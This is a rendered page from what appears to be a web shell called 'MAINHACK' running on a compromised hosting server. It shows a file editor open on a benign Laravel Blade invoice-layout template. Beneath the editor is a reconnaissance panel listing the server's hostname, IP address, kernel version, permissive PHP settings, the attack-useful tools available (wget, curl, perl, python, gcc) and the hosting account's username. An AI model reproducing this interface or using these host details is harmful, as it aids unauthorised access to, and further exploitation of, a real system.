[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: invoice_layout.blade.php
@php $default = []; $default['show_table'] = 1; $default['table_label'] = 'Table'; $default['show_service_staff'] = 1; $default['service_staff_label'] = 'Service staff'; if(!empty($edit_il)){ $default['show_table'] = isset($module_info['tables']['show_table']) ? $module_info['tables']['show_table'] : 0; $default['table_label'] = isset($module_info['tables']['table_label']) ? $module_info['tables']['table_label'] : ''; $default['show_service_staff'] = isset($module_info['service_staff']['show_service_staff']) ? $module_info['service_staff']['show_service_staff'] : 0; $default['service_staff_label'] = isset($module_info['service_staff']['service_staff_label']) ? $module_info['service_staff']['service_staff_label'] : ''; } @endphp @if(!empty($enabled_modules)) <div class="box box-solid"> <div class="box-body"> <div class="box-header"> <h3 class="box-title">@lang('lang_v1.restaurant_module_settings')</h3> </div> <div class="row"> @if(in_array('tables', $enabled_modules) ) <div class="col-sm-3"> <div class="form-group"> <div class="checkbox"> <label> {!! Form::checkbox('module_info[tables][show_table]', 1, $default['show_table'], ['class' => 'input-icheck']); !!} @lang('restaurant.show_table') </label> </div> </div> </div> <div class="col-sm-3"> <div class="form-group"> {!! Form::label('module_info[tables][table_label]', __('restaurant.table_label') . ':' ) !!} {!! Form::text('module_info[tables][table_label]', $default['table_label'], ['class' => 'form-control', 'placeholder' => __('restaurant.table_label') ]); !!} </div> </div> @endif @if(in_array('service_staff', $enabled_modules) ) <div class="col-sm-3"> <div class="form-group"> <div class="checkbox"> <label> {!! Form::checkbox('module_info[service_staff][show_service_staff]', 1, $default['show_service_staff'], ['class' => 'input-icheck']); !!} @lang('restaurant.show_service_staff') </label> </div> </div> </div> <div class="col-sm-3"> <div class="form-group"> {!! Form::label('module_info[service_staff][service_staff_label]', __('restaurant.service_staff_label') . ':' ) !!} {!! Form::text('module_info[service_staff][service_staff_label]', $default['service_staff_label'], ['class' => 'form-control', 'placeholder' => __('restaurant.service_staff_label') ]); !!} </div> </div> @endif </div> </div> </div> @endif
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium320.web-hosting.com
Server IP: 66.29.153.54
PHP Version: 8.2.29
Server Software: LiteSpeed
System: Linux premium320.web-hosting.com 4.18.0-553.50.1.lve.el8.x86_64 #1 SMP Thu Apr 17 19:10:24 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 76.85 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
No
git:
Yes
User Info
Username: aoneqssk
User ID (UID): 1285
Group ID (GID): 1290
Script Owner UID: 1285
Current Dir Owner: 1285